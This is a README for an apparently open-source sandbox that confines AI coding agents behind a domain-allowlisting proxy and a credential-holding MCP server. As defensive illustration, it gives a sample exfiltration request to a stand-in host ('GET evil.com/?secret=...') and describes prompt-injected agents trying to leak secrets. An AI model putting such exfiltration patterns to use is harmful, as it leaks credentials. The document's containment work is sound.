HarshdeepGupta/managed-agent-runtime

Managed Agent Runtime

A capability-confined sandbox for running AI coding agents in YOLO mode. Instead of trusting the agent to behave, you make harm structurally impossible. The worst a fully compromised or prompt-injected agent can do is open a pull request on a private repo — it cannot exfiltrate secrets, reach arbitrary hosts, or touch the cloud directly.

This repo is two things:

  • PROMPT.md — the brief that defines the system. This is the artifact that matters: hand it to a capable coding agent and it can build a runtime like this one. It's a refined version of the original idea with the security mistakes corrected.
  • sample-implementation/ — one working, tested implementation of that brief (Docker + Squid + a stdlib MCP server), with a test suite that proves the security properties hold.

The idea in one picture

[Figure: Managed Agent Runtime architecture]

  • The agent sits on an internal-only network: it has no internet route at all.
  • Its only way out is the proxy, which allows a short list of trusted domains and denies everything else. This — not an "allow GET / block POST" filter — is what actually stops exfiltration (a GET evil.com/?secret=... leaks just fine).
  • The cloud credential lives only in the MCP server. There is no az CLI in the agent, so the only path to the cloud is through MCP tools that return derived, scrubbed results. The agent never sees the secret.
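The allowlist decision described in the second bullet can be sketched in a few lines. This is an illustrative Python model, not the Squid configuration the sample implementation uses: `ALLOWED_DOMAINS`, `is_allowed`, and `proxy_decision` are hypothetical names, the domain list is an assumption, and treating subdomains as allowed is a design choice made only for this sketch.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; the real list lives in the proxy configuration.
ALLOWED_DOMAINS = {"github.com", "api.github.com"}


def is_allowed(url: str, allowed: set[str] = ALLOWED_DOMAINS) -> bool:
    """Return True only if the URL's host is an allowlisted domain or a subdomain of one."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed)


def proxy_decision(method: str, url: str) -> str:
    """Decide on the destination host alone."""
    # The method is deliberately ignored: a GET can carry a secret in its
    # query string just as easily as a POST can carry one in its body.
    return "ALLOW" if is_allowed(url) else "DENY"


if __name__ == "__main__":
    print(proxy_decision("GET", "https://api.github.com/zen"))
    print(proxy_decision("GET", "https://evil.com/?secret=abc"))
```

Because the decision depends only on the host, a request to a non-allowlisted domain is denied whether it is a GET or a POST, which is the property a method-based filter cannot provide.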

See PROMPT.md for the two-layer mediation model (proxy floor + MCP high-trust lane) and the full acceptance criteria.

Running the sample implementation

```bash
cd sample-implementation

# Build and start the three containers (agent, proxy, mcp-server)
docker compose build
docker compose up -d
docker compose ps          # all three should be "Up"

# Prove the security properties (runs commands inside the agent container)
./tests/run-tests.sh

# Exec in and play the part of the agent
docker exec -it mar-agent bash
#   curl https://api.github.com/zen     # allowed
#   curl https://example.com            # blocked by the proxy
#   mcp_call azure_whoami               # cloud access without the credential
#   mcp_call web_fetch url=https://api.github.com/zen

# Watch egress decisions live
docker exec mar-proxy tail -f /var/log/squid/access.log

# Optional: give the agent a real GitHub PAT (read + create-PR, private repos)
GH_TOKEN=ghp_xxx docker compose up -d
./tests/run-tests.sh       # now also exercises GitHub access

# Tear down
docker compose down
```

What the test suite proves

| # | Property |
|---|----------|
| 1 | Agent has no direct internet route (bypassing the proxy fails) |
| 2 | Egress is domain-allowlisted (github allowed, example.com denied) |
| 3 | The cloud credential is never visible to the agent |
| 4 | A vulnerable tool's secret leak is scrubbed by the MCP server |
| 5 | Exfiltration blocked: GET and POST to a non-allowlisted host fail |
| 6 | No az CLI in the agent; GitHub access is scoped (PAT) |
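Property 4 is the least obvious of these, so here is a minimal sketch of what scrubbing a leaky tool's output could look like. It is an assumption about the general technique, not the sample implementation's code: `scrub`, `run_tool`, `leaky_tool`, and the secret value are all hypothetical.

```python
REDACTED = "[REDACTED]"


def scrub(text: str, secrets: list[str]) -> str:
    """Replace every literal occurrence of each known secret with a placeholder."""
    # Longest first, so a secret that contains another one is removed whole.
    # Empty strings are skipped because replacing "" would corrupt the text.
    for secret in sorted(filter(None, secrets), key=len, reverse=True):
        text = text.replace(secret, REDACTED)
    return text


def run_tool(tool, secrets: list[str]) -> str:
    """Run a tool inside the trusted server and scrub its output before returning it."""
    return scrub(tool(), secrets)


def leaky_tool() -> str:
    """A deliberately vulnerable tool that echoes its credential (hypothetical)."""
    return "login ok, token=s3cr3t-value"


if __name__ == "__main__":
    print(run_tool(leaky_tool, ["s3cr3t-value"]))
```

A literal match like this only catches the secret in its exact form; an encoded copy (base64, for example) would pass through, which is one reason the server that does the scrubbing has to stay small and audited.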

Honest limitations

This is a proof of concept that demonstrates the model, not a finished product. Three gaps are worth naming. First, the proxy trusts the CONNECT hostname without verifying it against the TLS SNI; a production deployment would want ssl_bump peek plus SNI allowlisting. Second, the MCP server is the trusted computing base and must be kept small and audited. Third, the MCP transport here is a minimal hand-rolled JSON-RPC subset rather than the official SDK over Streamable HTTP. All three are called out in PROMPT.md and in code comments so they aren't mistaken for solved problems.
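To make "a minimal hand-rolled JSON-RPC subset" concrete, the sketch below handles a single JSON-RPC 2.0 request using only the standard library. It is an assumption about the general shape, not the repository's code: `handle`, `TOOLS`, and the stubbed tool body are hypothetical, and only the `tools/list` and `tools/call` methods and the standard JSON-RPC error codes are modeled.

```python
import json

# Hypothetical tool registry. `azure_whoami` is named in the README; its body is a stub.
TOOLS = {"azure_whoami": lambda args: "derived, scrubbed result"}


def _error(rid, code: int, message: str) -> str:
    """Build a JSON-RPC 2.0 error response."""
    return json.dumps({"jsonrpc": "2.0", "id": rid,
                       "error": {"code": code, "message": message}})


def handle(raw: str) -> str:
    """Handle one JSON-RPC 2.0 request string and return the response string."""
    try:
        req = json.loads(raw)
    except json.JSONDecodeError:
        return _error(None, -32700, "Parse error")
    if not isinstance(req, dict):
        return _error(None, -32600, "Invalid Request")

    rid, method = req.get("id"), req.get("method")
    params = req.get("params")
    if not isinstance(params, dict):
        params = {}

    if method == "tools/list":
        # Subset only: a fuller server would also describe each tool's inputs.
        result = {"tools": [{"name": name} for name in sorted(TOOLS)]}
    elif method == "tools/call":
        name = params.get("name")
        if name not in TOOLS:
            return _error(rid, -32602, "Unknown tool")
        text = TOOLS[name](params.get("arguments") or {})
        result = {"content": [{"type": "text", "text": text}]}
    else:
        return _error(rid, -32601, "Method not found")
    return json.dumps({"jsonrpc": "2.0", "id": rid, "result": result})


if __name__ == "__main__":
    print(handle('{"jsonrpc":"2.0","id":1,"method":"tools/call",'
                 '"params":{"name":"azure_whoami"}}'))
```

A subset this small is easy to audit, which suits a trusted component, but it skips the initialization handshake, capability negotiation, and transport details that the official SDK handles.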

About

A capability-confined Docker sandbox to run AI coding agents in YOLO mode safely. Worst case it opens a PR.
